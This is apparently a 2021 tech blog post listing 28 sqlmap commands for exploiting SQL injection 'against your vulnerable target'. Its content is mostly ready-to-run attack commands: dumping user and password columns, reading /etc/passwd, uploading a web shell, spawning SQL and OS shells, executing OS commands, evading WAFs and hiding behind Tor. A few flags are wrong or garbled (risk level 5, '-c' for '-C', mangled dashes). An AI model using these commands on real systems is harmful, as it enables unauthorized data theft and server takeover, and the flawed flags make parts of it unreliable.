October 22, 2021

TECH HYME

A Blog For Tech Enthusiasts

Top SQLMAP Commands For Exploitation of SQL Injection

3 min read
sqlmap commands tech hyme

Structured Query Language, which is better known as SQL, is the underlining common programing language that is understood by most database management systems. It provides a common way for application to access the data in the database by using a common set of commands the database can understand.

Attackers exploit these databases by making them output information that they should not be displaying. Sometimes this is as simple as the attacker asking for privileged information from the database management system. Other times, it is taking advantage of poor configurations by database administrators.

Also Read:

Attackers may also take advantage of a vulnerability in the database management system that allows the attacker to view or write privileged commands to and from the database.

Sqlmap automates the process of detecting and exploiting SQL injection vulnerability and taking over of database servers. Sqlmap comes with a detection engine, as well as a broad range of Penetration Testing (PT) features that range from DB fingerprinting to accessing the underlying file system and executing commands on the operating
system via out-of-band connections.

The basic syntax to use Sqlmap is:

sqlmap -u URL – – function

Below is the list of most useful important SQLMAP Commands which you can use against your vulnerable target:

1. GET Request

sqlmap -u http://example.com/page.php?id=1 --dbs

2. From File

sqlmap -r request.txt

3. Testing with pattern of URL’s

sqlmap -u http://example.com/page/*/view --dbs

4. POST Request

sqlmap -u http://example.com/login.php --data "username=admin&pass=admin&submit=submit" -p username

5. Using Cookies

sqlmap -u http://example.com/enter.php --cookie="PHPSESSID=45634b63g643f563456g4356g" -u http://example.com/index.php?id=1

6. Extract Databases (DB Enumeration)

sqlmap -u http://example.com/page.php?id=1 --dbs

7. Identify Current DB

sqlmap -u http://example.com/page.php?id=1 --current-db

8. Extract Tables

sqlmap -u http://example.com/page.php?id=1 -D database --tables

9. Extract Columns

sqlmap -u http://example.com/page.php?id=1 -D database -T table_name --columns

10. Dumping Data

sqlmap -u http://example.com/page.php?id=1 -D database -T table_name -C colum1,column2 --dump

11. Multithreading

sqlmap -u http://example.com/page.php?id=1 --dbs --threads 5

12. Null-Connection

sqlmap -u http://example.com/page.php?id=1 --dbs --null-connection

13. HTTP Persistant Connection

sqlmap -u http://example.com/page.php?id=1 --dbs --keep-alive

14. Output prediction

sqlmap -u http://example.com/page.php?id=1 -D database -T user -c users,password --dump --predict-output

15. Checking privilages

sqlmap -u http://example.com/page.php?id=1 --privileges

16. Reading Files from the server

sqlmap -u http://example.com/page.php?id=1 --file-read=/etc/passwd

17. Uploading Files/Shell

sqlmap -u http://example.com/page.php?id=1 --file-write=/root/shell.php --file-dest=/var/www/shell.php

18. SQL Shell

sqlmap -u http://example.com/page.php?id=1 --sql-shell

19. OS shell

sqlmap -u http://example.com/page.php?id=1 --os-shell

20. OS Command Exe without Shell Upload

sqlmap -u http://example.com/page.php?id=1 --os-cmd "uname -a"

21. Using Proxy

sqlmap --proxy="127.0.0.1:8080" -u http://example.com/page.php?id=1 --dbs

22. Using Proxy with Credentials

sqlmap -–proxy="127.0.0.1:8080" –-proxy-cred=username:password -u http://example.com/page.php?id=1

23. Crawling

sqlmap -u http://example.com/ --crawl=1

24. Exploitation in Verbose Mode

sqlmap -u http://example.com/page.php?id=1 -v 3

25. Bypassing WAF (Web Application Firewall)

sqlmap -u http://example.com/page.php?id=1 --tamper=apostrophemask

26. Scanning Key Based Authentication Page

sqlmap -u http://example.com/page.php?id=1 --auth-file=

27. To use default TOR Network

sqlmap -u http://example.com/page.php?id=1 --tor

28. Scanning with High Risk and Level

sqlmap -u http://example.com/page.php?id=1 --level=3 --risk=5

Leave a Reply